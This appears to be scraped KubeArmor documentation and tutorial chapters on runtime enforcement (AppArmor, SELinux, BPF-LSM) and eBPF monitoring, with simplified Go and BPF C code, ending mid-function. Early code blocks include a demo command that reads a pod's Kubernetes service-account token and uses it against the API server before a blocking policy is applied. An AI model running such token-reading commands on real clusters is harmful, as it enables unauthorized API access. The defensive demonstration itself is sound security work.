  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "HostPPID": 3341922,
  "HostPID": 3341928,
  "PPID": 786,
  "PID": 792,
  "ParentProcessName": "/bin/dash",
  "ProcessName": "/usr/bin/apt",
  "PolicyName": "block-pkg-mgmt-tools-exec",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/dash",
  "Operation": "Process",
  "Resource": "/usr/bin/apt update",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Permission denied"
}
❯ kubectl exec -it $POD -- bash
(inside pod) $ curl https://$KUBERNETES_PORT_443_TCP_ADDR/api --insecure --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)"
{                                
  "kind": "APIVersions",      
  "versions": [                 
    "v1"                      
  ],                          
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "ip-10-0-48-51.us-east-2.compute.internal:443"
    }
  ]
}
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-service-access-token-access
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /run/secrets/kubernetes.io/serviceaccount/
      recursive: true
  action:
    Block
EOF
❯ kubectl exec -it $POD -- bash
(inside pod) $ curl https://$KUBERNETES_PORT_443_TCP_ADDR/api --insecure --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)"
cat: /run/secrets/kubernetes.io/serviceaccount/token: Permission denied
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/api\"",
  "reason": "Forbidden",
  "details": {},
  "code": 403
}
kubectl annotate ns default kubearmor-visibility="process,file,network" --overwrite
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-etc-nginx-access
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /etc/nginx/
      recursive: true  
  action:
    Audit
EOF
{
  "Timestamp": 1686478371,
  "UpdatedTime": "2023-06-11T10:12:51.967519Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "HostPPID": 3224933,
  "HostPID": 3371357,
  "PPID": 3224933,
  "PID": 825,
  "ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/bin/cat",
  "PolicyName": "audit-etc-nginx-access",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/cat /etc/nginx/conf.d/default.conf",
  "Operation": "File",
  "Resource": "/etc/nginx/conf.d/default.conf",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY",
  "Enforcer": "eBPF Monitor",
  "Action": "Audit",
  "Result": "Passed"
}
kubectl annotate ns default kubearmor-file-posture=block --overwrite
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: only-allow-nginx-exec
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /
      recursive: true  
  process:
    matchPaths:
    - path: /usr/sbin/nginx
    - path: /bin/bash
  action:
    Allow
EOF
kubectl exec -it $POD -- bash -c "chroot"
Quoting Grsecurity
Pod Security Context
native AppArmor
native SELinux
Armoring Cloud Native Workloads with BPF-LSM
Securing Bottlerocket deployments on Amazon EKS with KubeArmor
k8s cluster
here
KubeArmor support matrix
here
Here's a guide
Security Posture

Runtime Enforcer

Welcome back! In the previous chapter, we learned how KubeArmor figures out who is performing an action on your system by understanding Container/Node Identity. We saw how it maps low-level system details like Namespace IDs to higher-level concepts like Pods, containers, and nodes, using information from the Kubernetes API and the container runtime.

Now that KubeArmor knows who is doing something, it needs to decide if that action is allowed. This is the job of the Runtime Enforcer.

What is the Runtime Enforcer?

Think of the Runtime Enforcer as the actual security guard positioned at the gates and doors of your system. It receives the security rules you defined in your Security Policies (KSP, HSP, CSP). But applications and the operating system don't directly understand KubeArmor policy YAML!

The Runtime Enforcer's main task is to translate these high-level KubeArmor rules into instructions that the underlying operating system's built-in security features can understand and enforce. These OS security features are powerful mechanisms within the Linux kernel designed to control what processes can and cannot do. Common examples include:

  • AppArmor: Used by distributions like Ubuntu, Debian, and SLES. It uses security profiles that define access controls for individual programs (processes).

  • SELinux: Used by distributions like Fedora, CentOS/RHEL, and Alpine Linux. It uses a system of labels and rules to control interactions between processes and system resources.

  • BPF-LSM: A newer mechanism using eBPF programs attached to Linux Security Module (LSM) hooks to enforce security policies directly within the kernel.

When an application or process on your node or inside a container attempts to do something (like open a file, start a new process, or make a network connection), the Runtime Enforcer (via the configured OS security feature) steps in. It checks the translated rules that apply to the identified workload and tells the operating system whether to Allow, Audit, or Block the action.

Why Do We Need a Runtime Enforcer? A Use Case Revisited

Let's go back to our example: preventing a web server container (with label app: my-web-app) from reading /etc/passwd.

In Chapter 1, we wrote a KubeArmor Policy for this:

# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-etc-passwd-read
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-web-app # Policy applies to containers/pods with this label
  file:
    matchPaths:
      - path: /etc/passwd # Specific file to protect
        # No readOnly specified means all access types are subject to 'action'
  action: Block # What to do if the rule is violated

In Chapter 2, we saw how KubeArmor's Container/Node Identity component identifies that a specific process trying to read /etc/passwd belongs to a container running a Pod with the label app: my-web-app.

Now, the Runtime Enforcer takes over:

  1. It knows the action is "read file /etc/passwd".

  2. It knows the actor is the container identified as having the label app: my-web-app.

  3. It looks up the applicable policies for this actor and action.

  4. It finds the block-etc-passwd-read policy, which says action: Block for /etc/passwd.

  5. The Runtime Enforcer, using the underlying OS security module, tells the Linux kernel to Block the read attempt.

The application trying to read the file will receive a "Permission denied" error, and the attempt will be stopped before it can succeed.

How KubeArmor Selects and Uses an Enforcer

KubeArmor is designed to be flexible and work on different Linux systems. It doesn't assume a specific OS security module is available. When KubeArmor starts on a node, it checks which security modules are enabled and supported on that particular system.

You can configure KubeArmor to prefer one enforcer over another using the lsm.lsmOrder configuration option. KubeArmor will try to initialize the enforcers in the specified order (bpf, selinux, apparmor) and use the first one that is available and successfully initialized. If none of the preferred ones are available, it falls back to any other supported, available LSM. If no supported enforcer can be initialized, KubeArmor will run in a limited capacity (primarily for monitoring, not enforcement).

You can see KubeArmor selecting the LSM in the NewRuntimeEnforcer function (from KubeArmor/enforcer/runtimeEnforcer.go):

// KubeArmor/enforcer/runtimeEnforcer.go (Simplified)

func NewRuntimeEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
	// ... code to check available LSMs on the system ...

	// This selectLsm function tries to find and initialize the best available enforcer
	return selectLsm(re, cfg.GlobalCfg.LsmOrder, availablelsms, lsms, node, pinpath, logger, monitor)
}

// selectLsm Function (Simplified logic)
func selectLsm(re *RuntimeEnforcer, lsmOrder, availablelsms, supportedlsm []string, node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
	// Try LSMs in preferred order first
	// If preferred fails or is not available, try others

	if kl.ContainsElement(supportedlsm, "bpf") && kl.ContainsElement(availablelsms, "bpf") {
		// Attempt to initialize BPFEnforcer
		re.bpfEnforcer, err = be.NewBPFEnforcer(...)
		if re.bpfEnforcer != nil {
			re.EnforcerType = "BPFLSM"
			// Success, return BPF enforcer
			return re
		}
		// BPF failed, try next...
	}

	if kl.ContainsElement(supportedlsm, "apparmor") && kl.ContainsElement(availablelsms, "apparmor") {
		// Attempt to initialize AppArmorEnforcer
		re.appArmorEnforcer = NewAppArmorEnforcer(...)
		if re.appArmorEnforcer != nil {
			re.EnforcerType = "AppArmor"
			// Success, return AppArmor enforcer
			return re
		}
		// AppArmor failed, try next...
	}

	if !kl.IsInK8sCluster() && kl.ContainsElement(supportedlsm, "selinux") && kl.ContainsElement(availablelsms, "selinux") {
		// Attempt to initialize SELinuxEnforcer (only for host policies outside K8s)
		re.seLinuxEnforcer = NewSELinuxEnforcer(...)
		if re.seLinuxEnforcer != nil {
			re.EnforcerType = "SELinux"
			// Success, return SELinux enforcer
			return re
		}
		// SELinux failed, try next...
	}

	// No supported/available enforcer found
	return nil
}

This snippet shows that KubeArmor checks for available LSMs (lsms) and attempts to initialize its corresponding enforcer module (be.NewBPFEnforcer, NewAppArmorEnforcer, NewSELinuxEnforcer) based on configuration and availability. The first one that succeeds becomes the active EnforcerType.

Once an enforcer is selected and initialized, the KubeArmor Daemon on the node loads the relevant policies for the workloads it is protecting and translates them into the specific rules required by the chosen enforcer.

The Enforcement Process: Under the Hood

When KubeArmor needs to enforce a policy on a specific container or node, here's a simplified flow:

  1. Policy Change/Discovery: A KubeArmor Policy (KSP, HSP, or CSP) is applied or changed via the Kubernetes API. The KubeArmor Daemon on the relevant node detects this.

  2. Identify Affected Workloads: The daemon determines which specific containers or the host node are targeted by this policy change using the selectors and its internal Container/Node Identity mapping.

  3. Translate Rules: For each affected workload, the daemon takes the high-level policy rules (e.g., Block access to /etc/passwd) and translates them into the low-level format required by the active Runtime Enforcer (AppArmor, SELinux, or BPF-LSM).

  4. Load Rules into OS: The daemon interacts with the operating system to load or update these translated rules. This might involve writing files, calling system utilities (apparmor_parser, chcon), or interacting with BPF system calls and maps.

  5. OS Enforcer Takes Over: The OS kernel's security module (now configured by KubeArmor) is now active.

  6. Action Attempt: A process within the protected workload attempts a specific action (e.g., opening /etc/passwd).

  7. Interception: The OS kernel intercepts this action using hooks provided by its security module.

  8. Decision: The security module checks the rules previously loaded by KubeArmor that apply to the process and resource involved. Based on the action (Allow, Audit, Block) defined in the KubeArmor policy (and translated into the module's format), the security module makes a decision.

  9. Enforcement:

    • If Block, the OS prevents the action and returns an error to the process.

    • If Allow, the OS permits the action.

    • If Audit, the OS permits the action but generates a log event.

  10. Event Notification (for Audit/Block): (As we'll see in the next chapter), the OS kernel generates an event notification for blocked or audited actions, which KubeArmor then collects for logging and alerting.

Here's a simplified sequence diagram for the enforcement path after policies are loaded:

This diagram shows that the actual enforcement decision happens deep within the OS kernel, powered by the rules that KubeArmor translated and loaded. KubeArmor isn't in the critical path for every action attempt; it pre-configures the kernel's security features to handle the enforcement directly.

Looking at the Code: Translating and Loading

Let's see how KubeArmor interacts with the different OS enforcers.

AppArmor Enforcer:

AppArmor uses text-based profile files stored typically in /etc/apparmor.d/. KubeArmor translates its policies into rules written in AppArmor's profile language, saves them to a file, and then uses the apparmor_parser command-line tool to load or update these profiles in the kernel.

// KubeArmor/enforcer/appArmorEnforcer.go (Simplified)

// UpdateAppArmorProfile Function
func (ae *AppArmorEnforcer) UpdateAppArmorProfile(endPoint tp.EndPoint, appArmorProfile string, securityPolicies []tp.SecurityPolicy) {
	// ... code to generate the AppArmor profile string based on KubeArmor policies ...
	// This involves iterating through securityPolicies and converting them to AppArmor rules

	newProfileContent := "## == Managed by KubeArmor == ##\n...\n" // generated content

	// Write the generated profile to a file
	newfile, err := os.Create(filepath.Clean("/etc/apparmor.d/" + appArmorProfile))
	// ... error handling ...
	_, err = newfile.WriteString(newProfileContent)
	// ... error handling and file closing ...

	// Load/reload the profile into the kernel using apparmor_parser
	if err := kl.RunCommandAndWaitWithErr("apparmor_parser", []string{"-r", "-W", "/etc/apparmor.d/" + appArmorProfile}); err != nil {
		// Log error if loading fails
		ae.Logger.Warnf("Unable to update ... (%s)", err.Error())
		return
	}

	ae.Logger.Printf("Updated security rule(s) to %s/%s", endPoint.EndPointName, appArmorProfile)
}

This snippet shows the key steps: generating the profile content, writing it to a file path based on the container/profile name, and then executing the apparmor_parser command with the -r (reload) and -W (wait) flags to apply the profile to the kernel.

SELinux Enforcer:

SELinux policy management is complex, often involving compiling policy modules and managing file contexts. KubeArmor's SELinux enforcer focuses primarily on basic host policy enforcement (in standalone mode, not typically in Kubernetes clusters using the default SELinux integration). It interacts with tools like chcon to set file security contexts based on policies.

// KubeArmor/enforcer/SELinuxEnforcer.go (Simplified)

// UpdateSELinuxLabels Function
func (se *SELinuxEnforcer) UpdateSELinuxLabels(profilePath string) bool {
	// ... code to read translated policy rules from a file ...
	// The file contains rules like "SubjectLabel SubjectPath ObjectLabel ObjectPath ..."

	res := true
	// Iterate through rules from the profile file
	for _, line := range strings.Split(string(profile), "\n") {
		words := strings.Fields(line)
		if len(words) != 7 { continue }

		subjectLabel := words[0]
		subjectPath := words[1]
		objectLabel := words[2]
		objectPath := words[3]

		// Example: Change the label of a file/directory using chcon
		if subjectLabel == "-" { // Rule doesn't specify subject path label
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
				// Log error if chcon fails
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
				res = false
			}
		} else { // Rule specifies both subject and object path labels
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", subjectLabel, subjectPath}); err != nil {
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", subjectLabel, subjectPath, err.Error())
				res = false
			}
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
				res = false
			}
		}
		// ... handles directory and recursive options ...
	}
	return res
}

This snippet shows KubeArmor executing the chcon command to modify the SELinux security context (label) of files, which is a key way SELinux enforces access control.

BPF-LSM Enforcer:

The BPF-LSM enforcer works differently. Instead of writing text files and using external tools, it loads eBPF programs directly into the kernel and populates eBPF maps with rule data. When an event occurs, the eBPF program attached to the relevant LSM hook checks the rules stored in the map to make the enforcement decision.

// KubeArmor/enforcer/bpflsm/enforcer.go (Simplified)

// NewBPFEnforcer instantiates a objects for setting up BPF LSM Enforcement
func NewBPFEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) (*BPFEnforcer, error) {
	// ... code to remove memory lock limits for BPF programs ...

	// Load the BPF programs and maps compiled from the C code
	if err := loadEnforcerObjects(&be.obj, &ebpf.CollectionOptions{
		Maps: ebpf.MapOptions{PinPath: pinpath},
	}); err != nil {
		// Handle loading errors
		be.Logger.Errf("error loading BPF LSM objects: %v", err)
		return be, err
	}

	// Attach BPF programs to LSM hooks
	// Example: Attach the 'EnforceProc' program to the 'security_bprm_check' LSM hook
	be.Probes[be.obj.EnforceProc.String()], err = link.AttachLSM(link.LSMOptions{Program: be.obj.EnforceProc})
	if err != nil {
		// Handle attachment errors
		be.Logger.Errf("opening lsm %s: %s", be.obj.EnforceProc.String(), err)
		return be, err
	}

    // ... similarly attach other BPF programs for file, network, capabilities, etc. ...

	// Get references to BPF maps (like the map storing rules per container)
	be.BPFContainerMap = be.obj.KubearmorContainers // Renamed from be.obj.Maps.KubearmorContainers

	// ... setup ring buffer for events (discussed in next chapter) ...

	return be, nil
}

// AddContainerIDToMap Function (Example of populating a map with rules)
func (be *BPFEnforcer) AddContainerIDToMap(containerID string, pidns, mntns uint32) {
	// ... code to get/generate rules for this container ...
	// rulesData := generateBPFRules(containerID, policies)

	// Look up or create the inner map for this container's rules
	containerMapKey := NsKey{PidNS: pidns, MntNS: mntns} // Uses namespace IDs as the key for the outer map

	// Update the BPF map with the container's rules or identity
	// This would typically involve creating/getting a reference to an inner map
	// and then populating that inner map with specific path -> rule mappings.
	// For simplification, let's assume a direct mapping for identity:
	containerMapValue := uint32(1) // Simplified: A value indicating the container is active

	if err := be.BPFContainerMap.Update(containerMapKey, containerMapValue, cle.UpdateAny); err != nil {
		be.Logger.Warnf("Error updating BPF map for container %s: %v", containerID, err)
	}
	// ... More complex logic would add rules to an inner map associated with this containerMapKey
}

This heavily simplified snippet shows how the BPF enforcer loads BPF programs and attaches them to kernel LSM hooks. It also hints at how container identity (Container/Node Identity) is used (via pidns, mntns) as a key to organize rules within BPF maps (BPFContainerMap), allowing the kernel's BPF program to quickly look up the relevant policy when an event occurs. The AddContainerIDToMap function, although simplified, demonstrates how KubeArmor populates these maps.

Each enforcer type requires specific logic within KubeArmor to translate policies and interact with the OS. The Runtime Enforcer component provides this abstraction layer, allowing KubeArmor policies to be enforced regardless of the underlying Linux security module, as long as it's supported.

Policy Actions and the Enforcer

The action specified in your KubeArmor policy (Security Policies) directly maps to how the Runtime Enforcer instructs the OS:

  • Allow: The translated rule explicitly permits the action. The OS security module will let the action proceed.

  • Audit: The translated rule allows the action but is configured to generate a log event. The OS security module lets the action proceed and notifies the kernel's logging system.

  • Block: The translated rule denies the action. The OS security module intercepts the action and prevents it from completing, typically returning an error to the application.

This allows you to use KubeArmor policies not just for strict enforcement but also for visibility and testing (Audit).

Conclusion

The Runtime Enforcer is the critical piece that translates your human-readable KubeArmor policies into the low-level language understood by the operating system's security features (AppArmor, SELinux, BPF-LSM). It's responsible for loading these translated rules into the kernel, enabling the OS to intercept and enforce your desired security posture for containers and host processes based on their identity.

By selecting the appropriate enforcer for your system and dynamically updating its rules, KubeArmor ensures that your security policies are actively enforced at runtime. In the next chapter, we'll look at the other side of runtime security: observing system events, including those that were audited or blocked by the Runtime Enforcer.

BPF (eBPF)

Welcome back to the KubeArmor tutorial! In the previous chapter, we explored the System Monitor, KubeArmor's eyes and ears inside the operating system, responsible for observing runtime events like file accesses, process executions, and network connections. We learned that the System Monitor uses a powerful kernel technology called eBPF to achieve this deep visibility with low overhead.

In this chapter, we'll take a closer look at BPF (Extended Berkeley Packet Filter), or eBPF as it's more commonly known today. This technology isn't just used by the System Monitor; it's also a key enforcer type available to the Runtime Enforcer component in the form of BPF-LSM. Understanding eBPF is crucial to appreciating how KubeArmor works at a fundamental level within the Linux kernel.

What is BPF (eBPF)?

Imagine the Linux kernel as the central operating system managing everything on your computer or server. Traditionally, if you wanted to add new monitoring, security, or networking features deep inside the kernel, you had to write C code, compile it as a kernel module, and load it. This is risky because bugs in kernel modules can crash the entire system.

eBPF provides a safer, more flexible way to extend kernel functionality. Think of it as a miniature, highly efficient virtual machine running inside the kernel. It allows you to write small programs that can be loaded into the kernel and attached to specific "hooks" (points where interesting events happen).

Here's the magic:

  • Safe: eBPF programs are verified by a kernel component called the "verifier" before they are loaded. The verifier ensures the program won't crash the kernel, hang, or access unauthorized memory.

  • Performant: eBPF programs run directly in the kernel's execution context when an event hits their hook. They are compiled into native machine code for the processor using a "Just-In-Time" (JIT) compiler, making them very fast.

  • Flexible: They can be attached to various hooks for monitoring or enforcement, including system calls, network events, tracepoints, and even Linux Security Module (LSM) hooks.

  • Data Sharing: eBPF programs can interact with user-space programs (like the KubeArmor Daemon) and other eBPF programs using shared data structures called BPF Maps.

Why KubeArmor Uses BPF (eBPF)

KubeArmor needs to operate deep within the operating system to provide effective runtime security for containers and nodes. It needs to:

  1. See Everything: Monitor low-level system calls and kernel events across different container namespaces (Container/Node Identity).

  2. Act Decisively: Enforce security policies by blocking forbidden actions before they can harm the system.

  3. Do it Efficiently: Minimize the performance impact on your applications.

eBPF is the perfect technology for this:

  • Deep Visibility: By attaching eBPF programs to kernel hooks, KubeArmor's System Monitor gets high-fidelity data about system activities as they happen.

  • High-Performance Enforcement: When used as a Runtime Enforcer via BPF-LSM, eBPF programs can quickly check policies against events directly within the kernel, blocking actions instantly without the need to switch back and forth between kernel and user space for every decision.

  • Low Overhead: eBPF's efficiency means it adds minimal latency to system calls compared to older kernel security mechanisms or relying purely on user-space monitoring.

  • Kernel Safety: KubeArmor can extend kernel behavior for security without the risks associated with traditional kernel modules.

BPF in Action: Monitoring and Enforcement

Let's look at how BPF powers both sides of KubeArmor's runtime protection:

1. BPF for Monitoring (The System Monitor)

As we saw in Chapter 4, the System Monitor observes events. This is primarily done using eBPF.

  • How it works: Small eBPF programs are attached to kernel hooks related to file, process, network, etc., events. When an event triggers a hook, the eBPF program runs. It collects relevant data (like the path, process ID, Namespace IDs) and writes this data into a special shared memory area called a BPF Ring Buffer.

  • Getting Data to KubeArmor: The KubeArmor Daemon (KubeArmor Daemon) in user space continuously reads events from this BPF Ring Buffer.

  • Context: The daemon uses the Namespace IDs from the event data to correlate it with the specific container or node (Container/Node Identity) before processing and sending the alert via the Log Feeder.

Simplified view of monitoring data flow:

This shows the efficient flow: the kernel triggers a BPF program, which quickly logs data to a buffer that KubeArmor reads asynchronously.

Let's revisit a simplified code concept for the BPF monitoring program side (C code compiled to BPF):

// Simplified BPF C code for monitoring (part of system_monitor.c)

struct event {
  u64 ts;
  u32 pid_id; // PID Namespace ID
  u32 mnt_id; // Mount Namespace ID
  u32 event_id; // Type of event
  char comm[16]; // Process name
  char path[256]; // File path or network info
};

// Define a BPF map of type RINGBUF for sending events to user space
struct {
  __uint(type, BPF_MAP_TYPE_RINGBUF);
  __uint(max_entries, 1 << 24);
} kubearmor_events SEC(".maps"); // This name is referenced in Go code

SEC("kprobe/sys_enter_openat") // Attach to the openat syscall entry
int kprobe__sys_enter_openat(struct pt_regs *ctx) {
  struct event *task_info;

  // Reserve space in the ring buffer
  task_info = bpf_ringbuf_reserve(&kubearmor_events, sizeof(*task_info), 0);
  if (!task_info)
    return 0; // Could not reserve space, drop event

  // Populate the event data
  task_info->ts = bpf_ktime_get_ns();
  struct task_struct *task = (struct task_struct *)bpf_get_current_task();
  task_info->pid_id = get_task_pid_ns_id(task); // Helper to get NS ID
  task_info->mnt_id = get_task_mnt_ns_id(task); // Helper to get NS ID
  task_info->event_id = 1; // Example: 1 for file open
  bpf_get_current_comm(&task_info->comm, sizeof(task_info->comm));

  // Get path argument (simplified greatly)
  // Note: Real BPF code needs careful handling of user space pointers
  const char *pathname = (const char *)PT_REGS_PARM2(ctx);
  bpf_probe_read_str(task_info->path, sizeof(task_info->path), pathname);

  // Submit the event to the ring buffer
  bpf_ringbuf_submit(task_info, 0);
  return 0;
}

Explanation:

  • struct event: Defines the structure of the data sent for each event.

  • kubearmor_events: Defines a BPF map of type RINGBUF. This is the channel for kernel -> user space communication.

  • SEC("kprobe/sys_enter_openat"): Specifies where this program attaches - at the entry of the openat system call.

  • bpf_ringbuf_reserve: Allocates space in the ring buffer for a new event.

  • bpf_ktime_get_ns, bpf_get_current_task, bpf_get_current_comm, bpf_probe_read_str: BPF helper functions used to get data from the kernel context (timestamp, task info, command name, string from user space).

  • bpf_ringbuf_submit: Sends the prepared event data to the ring buffer.

On the Go side, KubeArmor's System Monitor uses the cilium/ebpf library to load this BPF object file and read from the kubearmor_events map (the ring buffer).

// Simplified Go code for reading BPF events (part of systemMonitor.go)

// systemMonitor Structure (relevant parts)
type SystemMonitor struct {
    // ... other fields ...
    SyscallPerfMap *perf.Reader // Represents the connection to the ring buffer
    // ... other fields ...
}

// Function to load BPF objects and start reading
func (mon *SystemMonitor) StartBPFMonitoring() error {
    // Load the compiled BPF code (.o file)
    objs := &monitorObjects{} // monitorObjects corresponds to maps and programs in the BPF .o file
    if err := loadMonitorObjects(objs, nil); err != nil {
        return fmt.Errorf("failed to load BPF objects: %w", err)
    }
    // mon.bpfObjects = objs // Store loaded objects (simplified)

    // Open the BPF ring buffer map for reading
    // "kubearmor_events" matches the map name in the BPF C code
    rd, err := perf.NewReader(objs.KubearmorEvents, os.Getpagesize())
    if err != nil {
        objs.Close() // Clean up loaded objects
        return fmt.Errorf("failed to create BPF ring buffer reader: %w", err)
    }
    mon.SyscallPerfMap = rd // Store the reader

    // Start a goroutine to read events from the buffer
    go mon.readEvents()

    // ... Attach BPF programs to hooks (simplified out) ...

    return nil
}

// Goroutine function to read events
func (mon *SystemMonitor) readEvents() {
    for {
        record, err := mon.SyscallPerfMap.Read() // Read a raw event from the kernel
        if err != nil {
            // ... error handling, check if reader was closed ...
            return
        }

        // Process the raw event data (parse bytes, add context)
        // As shown in Chapter 4 context:
        // dataBuff := bytes.NewBuffer(record.RawSample)
        // ctx, err := readContextFromBuff(dataBuff) // Parses struct event
        // ... lookup containerID using ctx.PidID, ctx.MntID ...
        // ... format and send event for logging ...
    }
}

Explanation:

  • loadMonitorObjects: Loads the compiled BPF program and map definitions from the .o file.

  • perf.NewReader(objs.KubearmorEvents, ...): Opens a reader for the specific BPF map named kubearmor_events defined in the BPF code. This map is configured as a ring buffer.

  • mon.SyscallPerfMap.Read(): Blocks until an event is available in the ring buffer, then reads the raw bytes sent by the BPF program.

  • The rest of the readEvents function (simplified out, but hinted at in Chapter 4 context) involves parsing these bytes back into a struct, looking up the container/node identity, and processing the event.

This demonstrates how BPF allows a low-overhead kernel component (the BPF program writing to the ring buffer) and a user-space component (KubeArmor Daemon reading from the buffer) to communicate efficiently.

2. BPF for Enforcement (BPF-LSM Enforcer)

When KubeArmor is configured to use the BPF-LSM Runtime Enforcer, BPF programs are used not just for monitoring, but for making enforcement decisions in the kernel.

  • How it works: BPF programs are attached to Linux Security Module (LSM) hooks. These hooks are specifically designed points in the kernel where security decisions are made (e.g., before a file is opened, before a program is executed, before a capability is used).

  • Policy Rules in BPF Maps: KubeArmor translates its Security Policies into a format optimized for quick lookup and stores these rules in BPF Maps. There might be nested maps where an outer map is keyed by Namespace IDs (Container/Node Identity) and inner maps store rules specific to paths, processes, etc., for that workload.

  • Decision Making: When an event triggers a BPF-LSM hook, the attached eBPF program runs. It uses the current process's Namespace IDs to look up the relevant policy rules in the BPF maps. Based on the rule found (or the default posture if no specific rule matches), the BPF program returns a value to the kernel indicating whether the action should be allowed (0) or blocked (-EPERM, which is kernel speak for "Permission denied").

  • Event Reporting: Even when an action is blocked, the BPF-LSM program (or a separate monitoring BPF program) will often still send an event to the ring buffer so KubeArmor can log the blocked attempt.

Simplified view of BPF-LSM enforcement flow:

This diagram shows the pre-configuration step (KubeArmor loading the program and rules) and then the fast, kernel-internal decision path when an event occurs.

Let's revisit a simplified BPF C code concept for enforcement (part of enforcer.bpf.c):

// Simplified BPF C code for enforcement (part of enforcer.bpf.c)

// Outer map: PidNS+MntNS -> reference to inner map (simplified to u32 for demo)
struct outer_key {
  u32 pid_ns;
  u32 mnt_ns;
};
struct {
  __uint(type, BPF_MAP_TYPE_HASH_OF_MAPS); // Or HASH, simplified
  __uint(max_entries, 256);
  __type(key, struct outer_key);
  __type(value, u32); // In reality, this points to an inner map
  __uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_containers SEC(".maps"); // Matches map name in Go code

// Inner map (concept): Path -> Rule
struct data_t {
  u8 processmask; // Flags like RULE_EXEC, RULE_DENY
};
// Inner maps are created/managed by KubeArmor in user space

SEC("lsm/bprm_check_security") // Attach to LSM hook for program execution
int BPF_PROG(enforce_proc, struct linux_binprm *bprm, int ret) {
  struct task_struct *t = (struct task_struct *)bpf_get_current_task();
  struct outer_key okey;
  get_outer_key(&okey, t); // Helper to get PidNS+MntNS

  // Look up the container's rules map using Namespace IDs
  u32 *inner_map_fd = bpf_map_lookup_elem(&kubearmor_containers, &okey);

  if (!inner_map_fd) {
    return ret; // No rules for this container, allow by default
  }

  // Get the program's path (simplified)
  struct path f_path = BPF_CORE_READ(bprm->file, f_path);
  char path[256];
  // Simplified path reading logic...
  bpf_probe_read_str(path, sizeof(path), /* path pointer */);

  // Look up the rule for this path in the inner map (conceptually)
  // struct data_t *rule = bpf_map_lookup_elem(inner_map_fd, &path); // Conceptually

  struct data_t *rule = /* Simplified: simulate lookup */ NULL; // Replace with actual map lookup

  // Decision logic based on rule and event type (BPF_CORE_READ bprm->file access mode)
  if (rule && (rule->processmask & RULE_EXEC)) {
      if (rule->processmask & RULE_DENY) {
          // Match found and action is DENY, block the execution
          // Report event (simplified out)
          return -EPERM; // Block
      }
      // Match found and action is ALLOW (or AUDIT), allow execution
      // Report event (if AUDIT) (simplified out)
      return ret; // Allow
  }

  // No specific DENY rule matched. Check default posture (simplified)
  u32 default_posture = /* Look up default posture in another map */ 0; // 0 for Allow

  if (default_posture == BLOCK_POSTURE) {
      // Default is BLOCK, block the execution
      // Report event (simplified out)
      return -EPERM; // Block
  }

  return ret; // Default is ALLOW or no default, allow
}

Explanation:

  • struct outer_key: Defines the key structure for the outer map (kubearmor_containers), using pid_ns and mnt_ns from the process's identity.

  • kubearmor_containers: A BPF map storing references to other maps (or rule data directly in simpler cases), allowing rules to be organized per container/namespace.

  • SEC("lsm/bprm_check_security"): Attaches this program to the LSM hook that is called before a new program is executed.

  • BPF_PROG(...): Macro defining the BPF program function.

  • get_outer_key: Helper function to get the Namespace IDs for the current task.

  • bpf_map_lookup_elem(&kubearmor_containers, &okey): Looks up the map (or data) associated with the current process's namespace IDs.

  • The core logic involves reading event data (like the program path), looking up the corresponding rule in the BPF maps, and returning 0 to allow or -EPERM to block, based on the rule's action flag (RULE_DENY).

  • Events are also reported to the ring buffer (kubearmor_events) for logging, similar to the monitoring path.

On the Go side, the BPF-LSM Runtime Enforcer component loads these programs and, crucially, populates the BPF Maps with the translated policies.

// Simplified Go code for loading BPF enforcement objects and populating maps (part of bpflsm/enforcer.go)

type BPFEnforcer struct {
    // ... other fields ...
    objs enforcerObjects // Holds loaded BPF programs and maps
    // ... other fields ...
}

// NewBPFEnforcer Function (simplified)
func NewBPFEnforcer(...) (*BPFEnforcer, error) {
    be := &BPFEnforcer{}

